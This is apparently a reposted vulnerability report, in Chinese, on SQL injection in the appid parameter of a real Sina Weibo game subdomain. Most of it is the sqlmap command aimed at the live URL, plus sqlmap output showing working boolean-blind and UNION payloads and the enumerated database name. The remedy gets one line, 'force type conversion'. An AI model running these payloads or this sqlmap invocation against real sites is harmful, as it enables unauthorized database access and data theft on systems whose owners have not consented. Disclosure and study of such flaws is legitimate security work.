新浪微博某分站存在SQL注入(可UNION)
程序员文章站
2022-04-02 23:49:55
新浪微博某分站存在SQL注入(可UNION)
# 网站
https://game.weibo.com
# 注入点,参数appid
https://game.weibo.com/webg...
新浪微博某分站存在SQL注入(可UNION)
# 网站
https://game.weibo.com
# 注入点,参数appid
https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888
python sqlmap.py -u "https://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs
sqlmap resumed the following injection point(s) from stored session: --- Parameter: appid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888 Type: UNION query Title: MySQL UNION query (80) - 13 columns Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888 --- [22:02:01] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 available databases [1]: [*] app_vgwebgame
解决方案:
强制类型转换
上一篇: Mellanox公司举办基于云基础设施的网络研讨会
下一篇: 云管理平台如何帮助企业实现云安全管理